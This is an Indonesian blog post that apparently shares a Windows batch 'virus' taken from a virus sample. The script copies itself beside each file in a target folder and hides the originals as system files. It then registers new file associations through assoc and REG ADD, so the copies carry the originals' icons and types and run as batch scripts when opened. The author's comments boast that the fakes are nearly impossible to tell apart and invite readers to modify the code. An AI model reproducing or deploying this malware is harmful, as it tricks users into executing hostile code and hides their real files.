Mengganti icon dengan file yang diinfeksi
Ini gue ambil dari contoh virus.... agak ribet musti daftarin file baru ke registrypadahal kalo menurut algoritma gue, sintaknya bisa lebih dipermudah! intinya ada
di perintah "assoc", silahkan di modif :
@echo off
setlocal ENABLEDELAYEDEXPANSION
::Mulai menginfeksi
:Start_Infect
for %%a in ("C:\Test\*.*") do (
set "ext=%%~xa"
set "for_check_ext=!ext:~-3!"
IF /i not "!for_check_ext!"=="vir" (
call :Find_Type
copy /y %0 "%%~dpna!ext!vir" && attrib +s +h "%%~fa"
)
)
GOTO :NEXT
::Cek jika ekstensi sudah ada
:Find_Type
REG Query "HKCR\!ext!vir" >nul 2>&1 && GOTO :EOF
for /f "tokens=1* delims==" %%a in ('assoc !ext!') do (
set "file_type=%%~b"
)
for /f "tokens=1* delims==" %%a in ('assoc !file_type!') do (
set "new_type=%%~b"
)
for /f "tokens=3*" %%a in ('REG QUERY "HKCR\!file_type!\DefaultIcon" ^| find /i "REG_SZ"') do (
set "icon_location=%%~b"
)
::Membuat ekstensi baru
:Create
(
ASSOC !ext!vir=vir!ext!
ASSOC vir!ext!=!new_type!
REG ADD "HKCR\vir!ext!"
REG ADD "HKCR\vir!ext!\DefaultIcon"
REG ADD "HKCR\vir!ext!\DefaultIcon" /ve /d "!icon_location!"
REG ADD "HKCR\vir!ext!\Shell"
REG ADD "HKCR\vir!ext!\Shell\Open"
REG ADD "HKCR\vir!ext!\Shell\Open\Command"
REG ADD "HKCR\vir!ext!\Shell\Open\Command" /ve /d "cmd /c type \"%%1\">\"%TEMP%\temp.bat\" && call \"%TEMP%\temp.bat\" && del /f /q \"%TEMP%\temp.bat\""
) >nul 2>&1
GOTO :EOF
:NEXT
::untuk percobaannya coba buat folder : "C:\Test"
::Terus, dalam folder tersebut isi file bermacam macam (*.doc, *.rar, *.mp3, dll)
::lalu jalankan codenya... kode ini ya!!!
::Liat file yang ada di dalam folder "Test" tsb, yang keliatan adalah virus dan file aslinya di
::superhidden..
::yang lebih mantapnya lagi nama,icon & type filenya sama persis.., sangat sulit dibedakan..
::di coba ye, gue ndiri butuh berkali-kali coba sebelum berhasil!
::Salam BENNY KIRANA
PAUSE
Langganan:
Posting Komentar
(
Atom
)
Tidak ada komentar :
Posting Komentar